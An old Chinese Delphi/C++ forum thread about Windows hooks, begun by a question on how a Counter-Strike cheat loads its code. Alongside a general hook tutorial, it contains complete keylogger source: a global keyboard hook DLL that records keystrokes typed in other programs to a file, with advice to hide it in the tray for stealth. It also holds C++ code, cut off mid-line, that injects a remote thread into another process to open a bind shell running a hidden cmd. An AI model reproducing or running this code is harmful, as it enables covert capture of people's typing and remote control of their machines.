请教，关于hook的[加载方式]问题,我1700分一起送,真的没有人会？？？？？？？？？？ (200分)

sdv · 2004-06-07

-- 来自：Another_eYes, 时间：2004-6-7 12:47:04, ID：2650000 那么是否可以认为cs原来就具备您说的特效(比如说调试时用的),只不过发布时某些开关关闭了而已, 而这个外挂所做的只是重新打开这些开关罢了. 这样的话根本就不需要任何hook,当然你也就跟踪不了了   -- 我也这样设想过，但是怎么也想不通的是 cs不可能支持winamp播放器把？ 但是通过这个东西启动就会支持 winamp,irc这样的功能拉~

Another_eYes · 2004-06-07

找个内存dump工具, dump下开和不开外挂下的内存镜像, 然后比较一下就知道外挂是否注入及注入的是什么了. btw, 注入并不一定会改变程序占用内存大小, 如果原来程序一开始就申请了一大块内存但是有部分永远也用不到......

sdv · 2004-06-07

内存dump出的大小相同阿~

刘麻子 · 2004-06-07

概念性问题不弄清楚，就跑出来眉飞色舞的讨论这讨论那的。[

] 什么是hook搞清楚先。最讨厌人家老是说hook、hook的，好象一说就高手了。

sdv · 2004-06-07

--- 来自：刘麻子, 时间：2004-6-7 14:09:15, ID：2650078 概念性问题不弄清楚，就跑出来眉飞色舞的讨论这讨论那的。[

] 什么是hook搞清楚先。最讨厌人家老是说hook、hook的，好象一说就高手了。 --- 这位高手说的对，我也只是接触这个东西2天 我只是知道是一种拦截替换的方法~ 至于深入的我也不知道 不知道您是否能通俗的给讲讲？

wwssdd2000 · 2004-06-07

第三十一章关于Hook （请不要转载） 一、基本概念： 钩子(Hook)，是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息，而且 所监视的窗口可以是其他进程所创建的。当消息到达后，在目标窗口处理函数之前处理它。钩子机制允许应用程序截获 处理window消息或特定事件。 钩子实际上是一个处理消息的程序段，通过系统调用，把它挂入系统。每当特定的消息发出，在没有到达目的窗口 前，钩子程序就先捕获该消息，亦即钩子函数先得到控制权。这时钩子函数即可以加工处理（改变）该消息，也可以不 作处理而继续传递该消息，还可以强制结束消息的传递。 二、运行机制： 1、钩子链表和钩子子程： 每一个Hook都有一个与之相关联的指针列表，称之为钩子链表，由系统来维护。这个列表的指针指向指定的，应用程序定义的，被Hook子程调用的回调函数，也就是该钩子的各个处理子程。当与指定的Hook类型关联的消息发生时，系统就把这个消息传递到Hook子程。一些Hook子程可以只监视消息，或者修改消息，或者停止消息的前进，避免这些消息传递到下一个Hook子程或者目的窗口。最近安装的钩子放在链的开始，而最早安装的钩子放在最后，也就是后加入的先获得控制权。 Windows 并不要求钩子子程的卸载顺序一定得和安装顺序相反。每当有一个钩子被卸载，Windows 便释放其占用的内存，并更新整个Hook链表。如果程序安装了钩子，但是在尚未卸载钩子之前就结束了，那么系统会自动为它做卸载钩子的操作。 钩子子程是一个应用程序定义的回调函数(CALLBACK Function),不能定义成某个类的成员函数，只能定义为普通的C函数。用以监视系统或某一特定类型的事件，这些事件可以是与某一特定线程关联的，也可以是系统中所有线程的事件。 delphi在windwos.pas中封装了HOOK的所有API函数。 钩子子程必须按照以下的语法： FUNCTION CALLBACK(nCode:integer;wParam:WPARAM;lParam:LPARAM):lresult;stdcall;export; nCode参数是Hook代码，Hook子程使用这个参数来确定任务。这个参数的值依赖于Hook类型，每一种Hook都有自己的Hook代码特征字符集。 wParam和lParam参数的值依赖于Hook代码，但是它们的典型值是包含了关于发送或者接收消息的信息。 2、钩子的安装与释放： 使用API函数SetWindowsHookEx()把一个应用程序定义的钩子子程安装到钩子链表中。SetWindowsHookEx函数总是在Hook链的开头安装Hook子程。当指定类型的Hook监视的事件发生时，系统就调用与这个Hook关联的Hook链的开头的Hook子程。每一个Hook链中的Hook子程都决定是否把这个事件传递到下一个Hook子程。Hook子程传递事件到下一个Hook子程需要调用CallNextHookEx函数。  SetWindowsHookEx( 　　　　　idHook:integer; // 钩子的类型，即它处理的消息类型 　　　　　lpfn:TFNHookProc; // 钩子子程的地址指针。如果dwThreadId参数为0或是一个由别的进程创建的线程的标识，lpfn必须指向DLL中的钩子子程。除此以外，lpfn可以指向当前进程的一段钩子子程代码。钩子函数的入口地址，当钩子钩到任何消息后便调用这个函数。 　　　　　hMod:HINST; // 应用程序实例的句柄。标识包含lpfn所指的子程的DLL。    如果dwThreadId 标识当前进程创建的一个线程，而且子程代码位于当前进程，hMod必须为NULL。可以很简单的设定其为本应用程序的实例句柄。 　　　　　dwThreadId

WORD  // 与安装的钩子子程相关联的线程的标识符。如果为0，钩子子程与所有的线程关联，即为全局钩子。 　　　　　): HHOOK; 　　函数成功则返回钩子子程的句柄，失败返回NULL。 　　以上所说的钩子子程与线程相关联是指在一钩子链表中发给该线程的消息同时发送给钩子子程，且被钩子子程先处理。 在钩子子程中调用得到控制权的钩子函数在完成对消息的处理后，如果想要该消息继续传递，那么它必须调用另外一个SDK中的API函数CallNextHookEx来传递它，以执行钩子链表所指的下一个钩子子程。这个函数成功时返回钩子链中 下一个钩子过程的返回值，返回值的类型依赖于钩子的类型。这个函数的原型如下：  CallNextHookEx(hhk:HHOOK ;nCode:integer ;wParam:WPARAM ;lParam:LPARAM): LRESULT; 　 hhk为当前钩子的句柄，由SetWindowsHookEx()函数返回。 NCode为传给钩子过程的事件代码。 wParam和lParam 分别是传给钩子子程的wParam值，其具体含义与钩子类型有关。钩子函数也可以通过直接返回TRUE来丢弃该消息，并阻止该消息的传递。否则的话，其他安装了钩子的应用程序将不会接收到钩子的通知而且还有可能产生不正确的结果。钩子在使用完之后需要用UnHookWindowsHookEx()卸载，否则会造成麻烦。释放钩子比较简单，UnHookWindowsHookEx()只有一个参数。函数原型如下： UnHookWindowsHookEx(hhk:HHOOK): BOOL; 函数成功返回TRUE，否则返回FALSE。 例如：使用hook拦截击键 function KeyboardHook(nCode: Integer; wParam: WPARAM;lParam: LPARAM): LResult; stdcall; var  Form1: TForm1;  WinHook: HHOOK; // a handle to the keyboard hook function implementation {$R *.DFM} procedure TForm1.FormCreate(Sender: TObject); begin    {install the keyboard hook function into the keyboard hook chain}     WinHook:=SetWindowsHookEx(WH_KEYBOARD, @KeyboardHook, 0, GetCurrentThreadID); end; procedure TForm1.FormDestroy(Sender: TObject); begin     {remove the keyboard hook function from the keyboard hook chain}     UnhookWindowsHookEx(WinHook); end; function KeyboardHook(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LResult; begin    {if we can process the hook information...}    if (nCode>-1) then    {...was the TAB key pressed?}    if (wParam=VK_TAB) then    begin       {if so, output a beep sound}       MessageBeep(0);      {indicate that the message was processed}   Result := 1;   end   else      {...was the RETURN key pressed?}   if (wParam=VK_RETURN) then   begin      {if so, and if the key is on the up stroke, cause the focus to move to the next control}     if ((lParam shr 31)=1) then         Form1.Perform(WM_NEXTDLGCTL, 0, 0);         {indicate that the message was processed}     Result := 1;     end     else        {otherwise, indicate that the message was not processed.}     Result := 0   else     {we must pass the hook information to the next hook in the chain}     Result := CallNextHookEx(WinHook, nCode, wParam, lParam); end; 　 3、一些运行机制： 在Win16环境中，DLL的全局数据对每个载入它的进程来说都是相同的；而在Win32环境中，情况却发生了变化，DLL函数中的代码所创建的任何对象（包括变量）都归调用它的线程或进程所有。当进程在载入DLL时，操作系统自动把DLL地址映射到该进程的私有空间，也就是进程的虚拟地址空间，而且也复制该DLL的全局数据的一份拷贝到该进程空间。也就是说每个进程所拥有的相同的DLL的全局数据，它们的名称相同，但其值却并不一定是相同的，而且是互不干涉的。 因此，在Win32环境下要想在多个进程中共享数据，就必须进行必要的设置。在访问同一个Dll的各进程之间共享存储器是通过存储器映射文件技术实现的。也可以把这些需要共享的数据分离出来，放置在一个独立的数据段里，并把该段的属性设置为共享。必须给这些变量赋初值，否则编译器会把没有赋初始值的变量放在一个叫未被初始化的数据段中。 #pragma data_seg预处理指令用于设置共享数据段。例如： #pragma data_seg("SharedDataName") HHOOK hHook=NULL; #pragma data_seg() 在#pragma data_seg("SharedDataName")和#pragma data_seg()之间的所有变量将被访问该Dll的所有进程看到和共享。 当进程隐式或显式调用一个动态库里的函数时，系统都要把这个动态库映射到这个进程的虚拟地址空间里(以下简称"地址空间")。这使得DLL成为进程的一部分，以这个进程的身份执行，使用这个进程的堆栈。 4、系统钩子与线程钩子： SetWindowsHookEx()函数的最后一个参数决定了此钩子是系统钩子还是线程钩子。 线程勾子用于监视指定线程的事件消息。线程勾子一般在当前线程或者当前线程派生的线程内。 系统勾子监视系统中的所有线程的事件消息。因为系统勾子会影响系统中所有的应用程序，所以勾子函数必须放在独立的动态链接库(DLL) 中。系统自动将包含"钩子回调函数"的DLL映射到受钩子函数影响的所有进程的地址空间中，即将这个DLL注入了那些进程。 几点说明： （1）如果对于同一事件（如鼠标消息）既安装了线程勾子又安装了系统勾子，那么系统会自动先调用线程勾子，然后调用系统勾子。 （2）对同一事件消息可安装多个勾子处理过程，这些勾子处理过程形成了勾子链。当前勾子处理结束后应把勾子信息传递给下一个勾子函数。 （3）勾子特别是系统勾子会消耗消息处理时间，降低系统性能。只有在必要的时候才安装勾子，在使用完毕后要及时卸载。 三、钩子类型 每一种类型的Hook可以使应用程序能够监视不同类型的系统消息处理机制。下面描述所有可以利用的Hook类型。 1、WH_CALLWNDPROC和WH_CALLWNDPROCRET Hooks WH_CALLWNDPROC和WH_CALLWNDPROCRET Hooks使你可以监视发送到窗口过程的消息。系统在消息发送到接收窗口过程之前调用WH_CALLWNDPROC Hook子程，并且在窗口过程处理完消息之后调用WH_CALLWNDPROCRET Hook子程。 WH_CALLWNDPROCRET Hook传递指针到CWPRETSTRUCT结构，再传递到Hook子程。CWPRETSTRUCT结构包含了来自处理消息的窗口过程的返回值，同样也包括了与这个消息关联的消息参数。 2、WH_CBT Hook 在以下事件之前，系统都会调用WH_CBT Hook子程，这些事件包括： 1. 激活，建立，销毁，最小化，最大化，移动，改变尺寸等窗口事件； 2. 完成系统指令； 3. 来自系统消息队列中的移动鼠标，键盘事件； 4. 设置输入焦点事件； 5. 同步系统消息队列事件。 Hook子程的返回值确定系统是否允许或者防止这些操作中的一个。 3、WH_DEBUG Hook 在系统调用系统中与其他Hook关联的Hook子程之前，系统会调用WH_DEBUG Hook子程。你可以使用这个Hook来决定是否允许系统调用与其他Hook关联的Hook子程。 4、WH_FOREGROUNDIDLE Hook 当应用程序的前台线程处于空闲状态时，可以使用WH_FOREGROUNDIDLE Hook执行低优先级的任务。当应用程序的前台线程大概要变成空闲状态时，系统就会调用WH_FOREGROUNDIDLE Hook子程。 5、WH_GETMESSAGE Hook 应用程序使用WH_GETMESSAGE Hook来监视从GetMessage or PeekMessage函数返回的消息。你可以使用WH_GETMESSAGE Hook去监视鼠标和键盘输入，以及其他发送到消息队列中的消息。 6、WH_JOURNALPLAYBACK Hook WH_JOURNALPLAYBACK Hook使应用程序可以插入消息到系统消息队列。可以使用这个Hook回放通过使用WH_JOURNALRECORD Hook记录下来的连续的鼠标和键盘事件。只要WH_JOURNALPLAYBACK Hook已经安装，正常的鼠标和键盘事件就是无效的。WH_JOURNALPLAYBACK Hook是全局Hook，它不能象线程特定Hook一样使用。WH_JOURNALPLAYBACK Hook返回超时值，这个值告诉系统在处理来自回放Hook当前消息之前需要等待多长时间（毫秒）。这就使Hook可以控制实时事件的回放。WH_JOURNALPLAYBACK是system-wide local hooks，它們不會被注射到任何行程位址空間。 7、WH_JOURNALRECORD Hook WH_JOURNALRECORD Hook用来监视和记录输入事件。典型的，可以使用这个Hook记录连续的鼠标和键盘事件，然后通过使用WH_JOURNALPLAYBACK Hook来回放。WH_JOURNALRECORD Hook是全局Hook，它不能象线程特定Hook一样使用。 WH_JOURNALRECORD是system-wide local hooks，它們不會被注射到任何行程位址空間。 8、WH_KEYBOARD Hook 在应用程序中，WH_KEYBOARD Hook用来监视WM_KEYDOWN and WM_KEYUP消息，这些消息通过GetMessage or PeekMessage function返回。可以使用这个Hook来监视输入到消息队列中的键盘消息。 9、WH_KEYBOARD_LL Hook WH_KEYBOARD_LL Hook监视输入到线程消息队列中的键盘消息。 10、WH_MOUSE Hook WH_MOUSE Hook监视从GetMessage 或者PeekMessage 函数返回的鼠标消息。使用这个Hook监视输入到消息队列中的鼠标消息。 11、WH_MOUSE_LL Hook WH_MOUSE_LL Hook监视输入到线程消息队列中的鼠标消息。 12、WH_MSGFILTER 和WH_SYSMSGFILTER Hooks WH_MSGFILTER 和WH_SYSMSGFILTER Hooks使我们可以监视菜单，滚动条，消息框，对话框消息并且发现用户使用ALT+TAB or ALT+ESC 组合键切换窗口。WH_MSGFILTER Hook只能监视传递到菜单，滚动条，消息框的消息，以及传递到通过安装了Hook子程的应用程序建立的对话框的消息。WH_SYSMSGFILTER Hook监视所有应用程序消息。 WH_MSGFILTER 和WH_SYSMSGFILTER Hooks使我们可以在模式循环期间过滤消息，这等价于在主消息循环中过滤消息。 通过调用CallMsgFilter function可以直接的调用WH_MSGFILTER Hook。通过使用这个函数，应用程序能够在模式循环期间使用相同的代码去过滤消息，如同在主消息循环里一样。 13、WH_SHELL Hook 外壳应用程序可以使用WH_SHELL Hook去接收重要的通知。当外壳应用程序是激活的并且当顶层窗口建立或者销毁时，系统调用WH_SHELL Hook子程。WH_SHELL 共有５钟情況： 1. 只要有个top-level、unowned 窗口被产生、起作用、或是被摧毁； 2. 当Taskbar需要重画某个按钮； 3. 当系统需要显示关于Taskbar的一个程序的最小化形式； 4. 当目前的键盘布局状态改变； 5. 当使用者按Ctrl+Esc去执行Task Manager（或相同级别的程序）。 按照惯例，外壳应用程序都不接收WH_SHELL消息。所以，在应用程序能够接收WH_SHELL消息之前，应用程序必须调用SystemParametersInfo function注册它自己。 HK实例剖析： 　　DELPHI提供了强大的可视化集成开发环境，它使得在Windows下的应用程序开发变得更加广泛，因此我们将用DELPHI编写一个动态链接库，然后在主程序中加以调用以实现系统挂钩的设置。具体步骤如下： 　　* 用DELPHI创建一个使用键盘挂钩的动态链接库HK.DLL 　　* 用DELPHI编写一个使用上述DLL的可执行文件HOOK.EXE 实现步骤 　　1.创建动态链接库 　　* 选择FILE菜单中的NEW选项，选择DLL产生一个新的模板，保存为HK.DPR 　　library HK . 　　uses 　　 SysUtils, 　　 Classes, 　　 hkproc in 'hkproc.pas'; //挂钩函数在文件中的定义 　　 exports //DLL的输出函数 　　 EnableHotKeyHook, 　　 DisableHotKeyHook; 　　 　　begin 　　 hNextHookProc :=0; 　　 Assign(f,'c:.txt');//将捕获的键值存入C盘的“code.txt”文件中 　　 Reset(f); //初始化“code.txt”文件 　　 procSaveExit := ExitProc; //DLL释放时解除挂钩 　　 ExitProc := @HotKeyHookExit; 　　end. 　　* 选择FILE菜单中的NEW选项，选择UNIT生成HKPROC.PAS 　　unit hkproc; 　　interface 　　uses 　　 Windows,Messages; 　　var 　　 f :file of char; 　　c:char; 　　i :integer; 　　j :integer; 　　 hNextHookProc : HHook; 　　 procSaveExit : Pointer; 　　function KeyboardHookHandler(iCode : Integer; 　　 wParam : WPARAM; 　　 lParam : LPARAM) : LRESULT; stdcall ; export; 　　function EnableHotKeyHook : BOOL ; export ; 　　function DisableHotKeyHook : BOOL; export ; 　　procedure HotKeyHookExit ; far ; 　　implementation 　　function KeyboardHookHandler(iCode : Integer; 　　 WParam : WPARAM; 　　 lParam : LPARAM) : LRESULT ;stdcall ; export; 　　const 　　 _KeyPressMask = $80000000 ; 　　begin 　　 Result :=0; 　　 if iCode <0 then 　　 begin 　　 Result :=CallNextHookEx(hNextHookProc,iCode, 　　 wParam,lParam); 　　 Exit; 　　 end; 　　 if((lParam and _KeyPressMask)=0) then 　　 begin 　　 i:=getkeystate($10); //返回Shift键的状态 　　 j:=getkeystate($14); //返回Caps Lock键的状态 　　 if((j and 1)=1 )then //判断CapsLock是否按下 　　 begin 　　 //判断Shift 是否按下 　　 if ((i and _KeyPressMask)=_KeyPressMask) then 　　 begin 　　 if (wparam<65) then //判断是字母键还是数字键 　　 begin 　　 c:=chr(wparam-16); 　　 end 　　 else 　　 begin 　　 c:= chr(wparam+32); 　　 end; 　　 end 　　 else 　　 begin 　　 if (wparam<65) then 　　 begin 　　 c:=chr(wparam); 　　 end 　　 else 　　 begin 　　 c:=chr(wparam); 　　 end; 　　 end; 　　 end 　　 else 　　 begin 　　 if ((i and _KeyPressMask)=_KeyPressMask) then 　　 begin 　　 if (wparam<65) then 　　 begin 　　 c:=chr(wparam-16); 　　 end 　　 else 　　 begin 　　 c:= chr(wparam); 　　 end; 　　 end 　　 else 　　 begin 　　 if (wparam<65) then 　　 begin 　　 c:=chr(wparam); 　　 end 　　 else 　　 begin 　　 c:=chr(wparam+32); 　　 end; 　　 end; 　　 end; 　　 seek(f,FileSize(f)); 　　 write(f,c); //将捕获的键码存入文件 　　 end; 　　end; 　　 　　function EnableHotKeyHook:BOOL;export; 　　begin 　　Result:=False; 　　if hNextHookProc <> 0 then exit; 　　hNextHookProc:=SetWindowsHookEx(WH_KEYBOARD, 　　KeyboardHookHandler,Hinstance,0); 　　Result:=hNextHookProc <>0 ; 　　end; 　　 　　function DisableHotKeyHook:BOOL; export; 　　begin 　　 if hNextHookPRoc <> 0 then 　　 begin 　　 UnhookWindowshookEx(hNextHookProc); 　　 hNextHookProc:=0; 　　 Messagebeep(0); 　　 Messagebeep(0); 　 　 　　 end; 　　 Result:=hNextHookPRoc=0; 　　end; 　　 　　procedure HotKeyHookExit; 　　begin 　　 if hNextHookProc <> 0 then DisableHotKeyHook; 　　 close(f); //关闭文件并自动解除挂钩 　　 ExitProc:=procSaveExit; 　　end; 　　end. 　　* 将程序编译后生成一个名为HK.DLL的动态链接库文件并存入“c:”目录下。 　　 　　 2．创建调用DLL的EXE程序HOOK.EXE 　　* 选择FILE菜单中的NEW选项，在New Items窗口中，选择Application选项。在窗体Form中，加入两个按键，一个定义为挂钩，另一个定义为解脱，同时加入一个文本框以提示挂钩的设置状况。将Unit1存为“c:.pas”，其相应的代码如下： 　　 　　unit hk; 　　interface 　　 　　uses 　　 Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, 　　 StdCtrls; 　　 　　type 　　 TForm1 = class(TForm) 　　 Button1: TButton; 　　 Button2: TButton; 　　 Edit1: TEdit; 　　 procedure Button1Click(Sender: TObject); 　　 procedure Button2Click(Sender: TObject); 　　 　　 private 　　 { Private declarations } 　　 public 　　 { Public declarations } 　　 end; 　　 　　var 　　 Form1: TForm1; 　　 　　implementation 　　 　　{$R *.DFM} 　　 　　function EnableHotKeyHook : BOOL;external 'HK.dll'; 　　//声明HOOK . DLL中的两函数 　　function DisableHotKeyHook :BOOL;external 'HK.dll'; 　　 　　procedure TForm1.Button1Click(Sender: TObject); 　　begin 　　 if EnableHotKeyHook() then 　　 begin 　　 edit1.text :='设置挂钩' 　　 end 　　end; 　　 　　procedure TForm1.Button2Click(Sender: TObject); 　　begin 　　 if DisableHotKeyHook() then 　　 begin 　　 edit1.Text :='挂钩解脱' 　　 end 　　end; 　　end. 　　* 选取Views菜单中的Project Source，将Project1存为“c:.dpr”，其代码如下： 　　 　　program hook; 　　uses 　　 Forms, 　　 hk in 'hk.pas' {Form1}; 　　{$R *.RES} 　　 　　begin 　　 Application.Initialize; 　　 Application.CreateForm(TForm1, Form1); 　　 Application.Run; 　　end. 　　 　　* 编译生成HOOK.EXE 程序并存入“c:”目录下。预先用“记事本”在“c:”目录下建立CODE.TXT文件，运行HOOK程序并单击“挂钩”键，文本框提示“设置系统挂钩”，这时启动写字板等应用程序，所键入的字母和数字将被记录在CODE.TXT文件中。 　　单击“解脱”键，文本框显示“挂钩解脱”，程序将停止对键盘的捕获。 　　将上述例子稍加改动，就可为系统安装其他类型的挂钩，同时为了增强程序的隐蔽性，可利用DELPHI中丰富的控件，将上述程序运行后，只需在屏幕右下部时钟处显示一个图标，就可以跟踪键盘等系统部件的工作状况了。 在许多系统中，出于安全或其它原因，常常要求随时对键盘进行监控，一个专业的监控程序必须具备两点，一是实时；二是作为指示图标运行。实际应用中把利用Hook（即钩子）技术编写的应用程序添加到Windows的任务栏的指示区中就能够很好的达到这个目的。我在参考了API帮助文档基础上，根据在Delphi开发环境中的具体实现分别对这两部分进行详细论述。 一、Hook(钩子)的实现： Hook是应用程序在Microsoft Windows 消息处理过程中设置的用来监控消息流并且处理系统中尚未到达目的窗口的某一类型消息过程的机制。如果Hook过程在应用程序中实现，若应用程序不是当前窗口时，该Hook就不起作用；如果Hook在DLL中实现，程序在运行中动态调用它，它能实时对系统进行监控。根据需要，我们采用的是在DLL中实现Hook的方式。 1．新建一个导出两个函数的DLL文件，在hookproc.pas中定义了钩子具体实现过 程。代码如下： library keyspy; uses windows, messages, hookproc in 'hookproc.pas'; exports setkeyhook, endkeyhook; begin nexthookproc:=0; procsaveexit:=exitproc; exitproc:=@keyhookexit; end. 2.在Hookproc.pas中实现了钩子具体过程： unit hookproc; interface uses Windows, Messages, SysUtils, Controls, StdCtrls; var nexthookproc:hhook; procsaveexit

ointer; function keyboardhook(icode:integer;wparam:wparam; lparam:lparam):lresult;stdcall;export; function setkeyhook:bool;export;//加载钩子 function endkeyhook:bool;export;//卸载钩子 procedure keyhookexit;far; const afilename='c:.txt';//将键盘输入动作写入文件中 var debugfile:textfile; implementation function keyboardhookhandler(icode:integer;wparam:wparam; lparam:lparam):lresult;stdcall;export; begin if icode<0 then begin result:=callnexthookex(hnexthookproc,icode,wparam,lparam); exit; end; assignfile(debugfile,afilename); append(debugfile); if getkeystate(vk_return)<0 then begin writeln(debugfile,''); write(debugfile,char(wparam)); end else write(debugfile,char(wparam)); closefile(debugfile); result:=0; end; function endkeyhook:bool;export; begin if nexthookproc<>0 then begin unhookwindowshookex(nexthookproc); nexthookproc:=0; messagebeep(0); end; result:=hnexthookproc=0; end; procedure keyhookexit;far; begin if nexthookproc<>0 then endkeyhook; exitproc:=procsaveexit; end; end. 二、Win95/98使用任务栏右方指示区来显示应用程序或工具图标对指示区图标的操作涉及了一个API函数Shell_NotifyIcon，它有两个参数，一个是指向TnotifyIconData结构的指针，另一个是要添加、删除、改动图标的标志。通过该函函数将应用程序的图标添加到指示区中，使其作为图标运行,增加专业特色。当程序起动后，用鼠标右键点击图标，则弹出一个菜单，可选择sethook或endhook。 unit kb; interface uses Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, Menus,shellapi; const icon_id=1; MI_iconevent=wm_user+1;//定义一个用户消息 type TForm1 = class(TForm) PopupMenu1: TPopupMenu; sethook1: TMenuItem; endhook1: TMenuItem; N1: TMenuItem; About1: TMenuItem; Close1: TMenuItem; Gettext1: TMenuItem; procedure FormCreate(Sender: TObject); procedure sethook1Click(Sender: TObject); procedure endhook1Click(Sender: TObject); procedure FormDestroy(Sender: TObject); procedure Close1Click(Sender: TObject); private { Private declarations } nid:tnotifyicondata; normalicon:ticon; public { Public declarations } procedure icontray(var msg:tmessage); message mi_iconevent; end; var Form1: TForm1; implementation {$R *.DFM} function setkeyhook:bool;external 'keyspy.dll'; function endkeyhook:bool;external 'keyspy.dll'; procedure tform1.icontray(var msg:tmessage); var pt:tpoint; begin if msg.lparam=wm_lbuttondown then sethook1click(self); if msg.LParam=wm_rbuttondown then begin getcursorpos(pt); setforegroundwindow(handle); popupmenu1.popup(pt.x,pt.y); end; end; procedure TForm1.FormCreate(Sender: TObject); begin normalicon:=ticon.create; application.title:=caption; nid.cbsize:=sizeof(nid); nid.wnd:=handle; nid.uid:=icon_id; nid.uflags:=nif_icon or nif_message or nif_tip; nid.ucallbackmessage:=mi_iconevent; nid.hIcon :=normalicon.handle; strcopy(nid.sztip,pchar(caption)); nid.uFlags:=nif_message or nif_icon or nif_tip; shell_notifyicon(nim_add,@nid); SetWindowLong(Application.Handle, GWL_EXSTYLE,WS_EX_TOOLWINDOW); end; procedure TForm1.sethook1Click(Sender: TObject); begin setkeyhook; end; procedure TForm1.endhook1Click(Sender: TObject); begin endkeyhook; end; procedure TForm1.FormDestroy(Sender: TObject); begin nid.uFlags :=0; shell_notifyicon(nim_delete,@nid); end; procedure TForm1.Close1Click(Sender: TObject); begin application.terminate; end; 该程序虽然只用了几个shellai函数，但是它涉及到了在Delphi中对DLL的引用、钩子实现、对指示区的操作、用户定义消息的处理、文件的读写等比较重要的内容，我相信这篇文章能对许多Delphi的初学者有所帮助。 该程序在Win98、Delphi6.0中正常运行。

pclan · 2004-06-09

//--------------------------------------------------------------------------- #include <vcl.h> #pragma hdrstop #include <winsock2.h> //--------------------------------------------------------------------------- #include<windows.h> #include<Shlwapi.h> #include<tlhelp32.h> #pragma comment(lib,"Shlwapi.lib") #pragma hdrstop //参数结构 ; typedef struct _RemotePara{ DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 提升应用级调试权限 DWORD GetPidByName(char *szName); // 根据进程名称得到进程ID // 远程线程执行体 DWORD __stdcall ThreadProc(RemotePara *Para){         WSADATA WSAData;         SOCKET listenSocket, clientSocket;         struct sockaddr_in server_addr, client_addr;         int iAddrSize = sizeof(client_addr);         SECURITY_ATTRIBUTES sa;         HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;         STARTUPINFO si;         PROCESS_INFORMATION ProcessInformation;         unsigned long lBytesRead = 0;         typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);         typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);         typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );         typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE); FARPROC PMessageBoxA; //FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc = (PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwLoadLibrary; PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll);         typedef int (WINAPI *P_libiconv_version);  //0         typedef int (WINAPI *PWW)(WORD,LPWSADATA); PWW PWSAStartup = (PWW)Para->dwWSAStartup; //PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket = (FARPROC)Para->dwSocket; Phtons = (FARPROC)Para->dwhtons; Pbind = (FARPROC)Para->dwbind; Plisten = (FARPROC)Para->dwlisten; Paccept = (FARPROC)Para->dwaccept; Psend = (FARPROC)Para->dwsend; Precv = (FARPROC)Para->dwrecv; Pclosesocket = (FARPROC)Para->dwclosesocket; PCreateProcessA = (FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile = (FARPROC)Para->dwReadFile; PCloseHandle = (FARPROC)Para->dwCloseHandle; PCreatePipe = (FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox;         //PWSAStartup((WORD)((1<<8)|1), (LPWSADATA)&WSAData);         PWSAStartup(MAKEWORD(2,2),&WSAData); /* listenSocket = PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family = AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr = INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0); if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0; if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数，可以直接调用 si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1; if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0; while(1) { memset(Para->Buff,0,4096); PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break; if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; }else { lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0); if(lBytesRead <=0 ) break; if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; } }           */ //PCloseHandle(hWritePipe2); //PCloseHandle(hReadPipe1); //PCloseHandle(hReadPipe2); //PCloseHandle(hWritePipe1); //Pclosesocket(listenSocket); //Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, 